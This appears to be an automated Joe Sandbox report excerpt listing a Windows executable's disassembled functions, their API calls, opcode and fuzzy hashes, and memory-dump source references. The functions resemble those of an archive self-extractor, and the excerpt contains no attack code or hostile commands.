                                                                                                                    • Instruction ID: 457a0f8fb634ad03fe2def73aa3288b0aeb24d74a58f1de2381edb731f97fba9
                                                                                                                    • Opcode Fuzzy Hash: d41481d7d649edb8d261232570e054cf7dcc5971d3ae759bbf4dee799087f5d3
                                                                                                                    • Instruction Fuzzy Hash: 45C0123205C280BECB090BB4DC0DC2BBBA8ABA5312F04C92CB0E5C2060C238C114EB11
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 080785c0add31a3eaa018b2a3d07e25d522d6220149ccf09e5a1fc3a924b3c76
                                                                                                                    • Instruction ID: e0229206a5fb17dfaae9cb806b47c9f1d0decb9a425b5cf50d6d708e13fd0acf
                                                                                                                    • Opcode Fuzzy Hash: 080785c0add31a3eaa018b2a3d07e25d522d6220149ccf09e5a1fc3a924b3c76
                                                                                                                    • Instruction Fuzzy Hash: 45C1D170A00A549FEF15EF68C488BA97FA9BF55310F0805B9EC45EB382DB309D46CB65
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 1c768d66f97fca1eed3952c54bf68456c10c5e6b2285af5972757d6cd070386b
                                                                                                                    • Instruction ID: 04c42129f816bbb1bd8e934effbeb06cfe61afece8c14959777e9d0aaabe7317
                                                                                                                    • Opcode Fuzzy Hash: 1c768d66f97fca1eed3952c54bf68456c10c5e6b2285af5972757d6cd070386b
                                                                                                                    • Instruction Fuzzy Hash: AB71D371500B459EDB25EB70C8499E7BFE9BF54701F400C2EE9ABA7241DA327A44CF11
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00588289
                                                                                                                      • Part of subcall function 005813DC: __EH_prolog.LIBCMT ref: 005813E1
                                                                                                                      • Part of subcall function 0058A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0058A598
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$CloseFind
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2506663941-0
                                                                                                                    • Opcode ID: b57269fe9fff99f1514e8a880ca3411b25bc00f1374210e7bfc821550272dc2f
                                                                                                                    • Instruction ID: f49710caf27d8271f3e0a98b2c1cd644b7e4e61c9dd4eab99ab48076d88413a6
                                                                                                                    • Opcode Fuzzy Hash: b57269fe9fff99f1514e8a880ca3411b25bc00f1374210e7bfc821550272dc2f
                                                                                                                    • Instruction Fuzzy Hash: 8D4196719446559ADF20FB60CC59AFABBA8FF40304F4404EAA98A77093EF715E85CB50
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 005813E1
                                                                                                                      • Part of subcall function 00585E37: __EH_prolog.LIBCMT ref: 00585E3C
                                                                                                                      • Part of subcall function 0058CE40: __EH_prolog.LIBCMT ref: 0058CE45
                                                                                                                      • Part of subcall function 0058B505: __EH_prolog.LIBCMT ref: 0058B50A
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 005813E1
                                                                                                                      • Part of subcall function 00585E37: __EH_prolog.LIBCMT ref: 00585E3C
                                                                                                                      • Part of subcall function 0058CE40: __EH_prolog.LIBCMT ref: 0058CE45
                                                                                                                      • Part of subcall function 0058B505: __EH_prolog.LIBCMT ref: 0058B50A
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0059B098
                                                                                                                      • Part of subcall function 005813DC: __EH_prolog.LIBCMT ref: 005813E1
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 005AACF8
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005AB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,005A9813,00000001,00000364,?,005A3F73,00000050,?,005C1030,00000200), ref: 005AB177
                                                                                                                    • _free.LIBCMT ref: 005AC4E5
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,005A9813,00000001,00000364,?,005A3F73,00000050,?,005C1030,00000200), ref: 005AB177
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 005A3C3F
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005ACA2C,00000000,?,005A6CBE,?,00000008,?,005A91E0,?,?,?), ref: 005A8E38
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00585AC2
                                                                                                                      • Part of subcall function 0058B505: __EH_prolog.LIBCMT ref: 0058B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     Joe Sandbox IDA Plugin
                                                                                                                     • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                     Similarity
                                                                                                                     • API ID: H_prolog
                                                                                                                     • String ID:
                                                                                                                     • API String ID: 3519838083-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0058A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0058A592,000000FF,?,?), ref: 0058A6C4
                                                                                                                      • Part of subcall function 0058A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0058A592,000000FF,?,?), ref: 0058A6F2
                                                                                                                      • Part of subcall function 0058A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0058A592,000000FF,?,?), ref: 0058A6FE
                                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0058A598
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     Joe Sandbox IDA Plugin
                                                                                                                     • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                     Similarity
                                                                                                                     • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                     • String ID:
                                                                                                                     • API String ID: 1464966427-0
                                                                                                                    APIs
                                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00590E3D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     Joe Sandbox IDA Plugin
                                                                                                                     • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                     Similarity
                                                                                                                     • API ID: ExecutionStateThread
                                                                                                                     • String ID:
                                                                                                                     • API String ID: 2211380416-0
                                                                                                                    APIs
                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0059A62C
                                                                                                                      • Part of subcall function 0059A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0059A3DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     Joe Sandbox IDA Plugin
                                                                                                                     • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                     Similarity
                                                                                                                     • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                     • String ID:
                                                                                                                     • API String ID: 1915507550-0
                                                                                                                    APIs
                                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00591B3E), ref: 0059DD92
                                                                                                                      • Part of subcall function 0059B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0059B579
                                                                                                                      • Part of subcall function 0059B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0059B58A
                                                                                                                      • Part of subcall function 0059B568: IsDialogMessageW.USER32(00010448,?), ref: 0059B59E
                                                                                                                      • Part of subcall function 0059B568: TranslateMessage.USER32(?), ref: 0059B5AC
                                                                                                                      • Part of subcall function 0059B568: DispatchMessageW.USER32(?), ref: 0059B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     Joe Sandbox IDA Plugin
                                                                                                                     • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                     Similarity
                                                                                                                     • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                     • String ID:
                                                                                                                     • API String ID: 897784432-0
                                                                                                                    APIs
                                                                                                                    • DloadProtectSection.DELAYIMP ref: 0059E5E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     Joe Sandbox IDA Plugin
                                                                                                                     • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                     Similarity
                                                                                                                     • API ID: DloadProtectSection
                                                                                                                     • String ID:
                                                                                                                     • API String ID: 2203082970-0
                                                                                                                    APIs
                                                                                                                    • GetFileType.KERNELBASE(000000FF,005897BE), ref: 005898C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     Joe Sandbox IDA Plugin
                                                                                                                     • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                     Similarity
                                                                                                                     • API ID: FileType
                                                                                                                     • String ID:
                                                                                                                     • API String ID: 3081899298-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E3FC
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     Joe Sandbox IDA Plugin
                                                                                                                     • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                     Similarity
                                                                                                                     • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                     • String ID:
                                                                                                                     • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E3FC
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: e2e38611840470cf2637a5d87d79e024d144fc6e3f61826b9a39bde0cfbd8dca
                                                                                                                    • Instruction ID: 24f8e1f5c6fc9aa2b13d8bfcc8d15c4f714e24fdf4d7d013ee0598c0d2f36419
                                                                                                                    • Opcode Fuzzy Hash: e2e38611840470cf2637a5d87d79e024d144fc6e3f61826b9a39bde0cfbd8dca
                                                                                                                    • Instruction Fuzzy Hash: CCB012E1268041BC3608D14A5D0FD770F4CF1C0B20330CC2FF584C2080EC402C0A0433
                                                                                                                    APIs
                                                                                                                    • SetEndOfFile.KERNELBASE(?,0058903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00589F0C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 749574446-0
                                                                                                                    • Opcode ID: eaa58108ead441946266165bd8136251d7981b3ae1b73b353889b671a887eba1
                                                                                                                    • Instruction ID: 4819a5099c0cf1bfee0e8ffa12549cd48f25f9b29d92c422b50518bd08061025
                                                                                                                    • Opcode Fuzzy Hash: eaa58108ead441946266165bd8136251d7981b3ae1b73b353889b671a887eba1
                                                                                                                    • Instruction Fuzzy Hash: B0A0113008000E8ACE802B30CA0800C3B20EB20BC030202A8A00ACA0A2CB22880BAA00
                                                                                                                    APIs
                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,0059AE72,C:\Users\user\Desktop,00000000,005C946A,00000006), ref: 0059AC08
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1611563598-0
                                                                                                                    • Opcode ID: c9403c4bea63db6f5375afbfbe0bc6a8941582e20201d5fdbfccde6f2d1397f5
                                                                                                                    • Instruction ID: 98670061eb30dfbffaca46fbddea9ba8a3b2418af5e876cf3c4d76c71537f357
                                                                                                                    • Opcode Fuzzy Hash: c9403c4bea63db6f5375afbfbe0bc6a8941582e20201d5fdbfccde6f2d1397f5
                                                                                                                    • Instruction Fuzzy Hash: 84A01130200200AB83000B328F0AA0EBAAAAFA2B00F00C028A00080030CB30C820FA00
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,005895D6,?,?,?,?,?,005B2641,000000FF), ref: 0058963B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: 9b0b1a905dcc393c613aa685c3c733c33d2a07a5aa1d0778bf4dccc45a106356
                                                                                                                    • Instruction ID: ba124ada0b067e8c83143f0df8159b4d0ab9b1d106eccb21cd524a3a8955a87a
                                                                                                                    • Opcode Fuzzy Hash: 9b0b1a905dcc393c613aa685c3c733c33d2a07a5aa1d0778bf4dccc45a106356
                                                                                                                    • Instruction Fuzzy Hash: CDF0E970481B459FDB31AA21C44CBA27BE87B12321F080B1ED8E3629E0E370658D8B40
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00581316: GetDlgItem.USER32(00000000,00003021), ref: 0058135A
                                                                                                                      • Part of subcall function 00581316: SetWindowTextW.USER32(00000000,005B35F4), ref: 00581370
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0059C2B1
                                                                                                                    • EndDialog.USER32(?,00000006), ref: 0059C2C4
                                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0059C2E0
                                                                                                                    • SetFocus.USER32(00000000), ref: 0059C2E7
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0059C321
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0059C358
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0059C36E
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0059C38C
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0059C39C
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0059C3B8
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0059C3D4
                                                                                                                    • _swprintf.LIBCMT ref: 0059C404
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0059C417
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0059C41E
                                                                                                                    • _swprintf.LIBCMT ref: 0059C477
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0059C48A
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0059C4A7
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0059C4C7
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0059C4D7
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0059C4F1
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0059C509
                                                                                                                    • _swprintf.LIBCMT ref: 0059C535
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0059C548
                                                                                                                    • _swprintf.LIBCMT ref: 0059C59C
                                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0059C5AF
                                                                                                                      • Part of subcall function 0059AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0059AF35
                                                                                                                      • Part of subcall function 0059AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,005BE72C,?,?), ref: 0059AF84
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                    • String ID: %s %s$%s %s %s$PY$REPLACEFILEDLG
                                                                                                                    • API String ID: 797121971-1026030046
                                                                                                                    • Opcode ID: a9ea698409f2eaf29530a9b0ca0dc9017c3320e5125f9bf21494e81054038756
                                                                                                                    • Instruction ID: 903b261c0940f4ad739454d499f370e63f255b2df066c016cb5d1d8e41d158f8
                                                                                                                    • Opcode Fuzzy Hash: a9ea698409f2eaf29530a9b0ca0dc9017c3320e5125f9bf21494e81054038756
                                                                                                                    • Instruction Fuzzy Hash: 21919572148349BBD721ABA0DC8DFFB7FACFB99700F004819F685D6081D771A6089B62
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00586FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00587013
                                                                                                                    • _wcslen.LIBCMT ref: 00587084
                                                                                                                      • Part of subcall function 00587A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00587AAB
                                                                                                                      • Part of subcall function 00587A9C: GetLastError.KERNEL32 ref: 00587AF1
                                                                                                                      • Part of subcall function 00587A9C: CloseHandle.KERNEL32(?), ref: 00587B00
                                                                                                                      • Part of subcall function 0058A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0058977F,?,?,005895CF,?,?,?,?,?,005B2641,000000FF), ref: 0058A1F1
